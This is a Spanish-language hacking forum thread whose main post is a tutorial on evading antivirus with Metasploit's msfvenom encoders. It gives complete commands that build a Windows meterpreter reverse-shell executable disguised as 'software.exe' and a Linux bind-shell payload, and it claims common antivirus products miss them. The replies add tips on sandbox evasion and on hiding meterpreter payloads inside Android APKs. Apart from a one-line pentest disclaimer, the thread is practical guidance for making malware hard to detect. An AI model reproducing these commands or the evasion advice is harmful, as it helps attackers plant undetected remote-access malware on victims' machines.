Hack x Crack - Comunidad de Seguridad informática

Seguridad Informatica => Hacking => Mensaje iniciado por: R3LI4NT en Mayo 02, 2021, 06:46:04 am

Título: Evadir Antivirus [MsfVenom encoders]
Publicado por: R3LI4NT en Mayo 02, 2021, 06:46:04 am
Hi,
antes de empezar quiero aclarar que metasploit y toda su utilidad es para intentar realizar pruebas de penetración y evaluación de vulnerabilidades, no para tratar causar mal a alguien utilizando malware.

Encoders > codificadores para evasión de antivirus y sistemas de seguridad.

Metasploit ofrece una gran variedad de encoders con su respectiva probabilidad de interrupción.
msfvenom -l encoders

(https://imagizer.imageshack.com/img923/5851/T8RZit.png)

Codificador  shikata_ga_nai:

Código: Text
  1. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.222.128 LPORT=4444 -e x86/shikata_ga_nai -i 8 -f exe -o /home/whoami/Escritorio/software.exe
  2.  

(https://imagizer.imageshack.com/img923/4729/k036Ra.png)

i: cantidad de veces que codifica el payload.

(https://imagizer.imageshack.com/img922/9571/N7L9sr.png)


Codificador  service:

(https://imagizer.imageshack.com/img923/2228/PlzWYz.png)


(https://imagizer.imageshack.com/img924/5522/bc7jEk.png)

Como observan, antivirus como Avast, Panda y AV (que son los más conocidos) no me lo detectan con él codificador service, se trata de ir probando y cambiando los valores, por supuesto que hay más formas avanzadas.

Código: Text
  1. msfconsole
  2. use payload/linux/x86/shell_bind_tcp
  3. generate
  4. encoder countdown XOR --> generate -e x86/countdown
  5. #Omitir varios caracteres que pueden generar problemas en el paylaod:
  6. generate -b '\x00\xa1\x66\x81'
  7. número de iteraciones para codificar:
  8. -i 4
  9. comando completo:
  10. generate -b '\x00\xa1\x66\x81' -i 5 lport=3131 -o /home/whoami/Escritorio/payload.exe
  11.  

(https://imagizer.imageshack.com/img923/5944/bOv8WU.png)

Recalcando lo anterior, hay varias maneras de codificar un malware y hacerlo lo menos detectable posible, en este caso les mostré la manera básica. En lo posible trataré de traer más información desarrollada sobre metasploit y la pasare a la revista "Road To Hacking", en la misma publicare las actualizaciones.

Saludos,
#R3LI4NT
Título: Re:Evadir Antivirus [MsfVenom encoders]
Publicado por: poseidon en Mayo 02, 2021, 02:46:44 pm
El problema viene cuando lo ejecutas, instala avast en una virtual y ejecuta el payload. Y así pasa con la mayoría. Hace años para saltar el sandbox de avast era tan simple como cargar el malware de MB , y la proactiva de los AV's igual.
Gracias por el tutorial.
Título: Re:Evadir Antivirus [MsfVenom encoders]
Publicado por: R3LI4NT en Mayo 02, 2021, 05:51:23 pm
El problema viene cuando lo ejecutas, instala avast en una virtual y ejecuta el payload. Y así pasa con la mayoría. Hace años para saltar el sandbox de avast era tan simple como cargar el malware de MB , y la proactiva de los AV's igual.
Gracias por el tutorial.
Antes utilizaba el script SideStep, esté formaba un bucle durante unos segundos al principio del programa para evadir sandboxes del AV, esto luego de comprobar le hora local del host a través de una función. El proyecto quedo abandonado y hoy por hoy ya es detectado.

Aún así los payloads en android pasan por alto, la gran cantidad de usuarios no tienen un AV instalado en su móvil por problemas de "ralentización"... pero peor es nada. Un payload simple (como el que acabo de hacer) llega a desconfiar a cualquiera, es por eso que prefiero incrustar un apk y obtener una sesión meterpreter.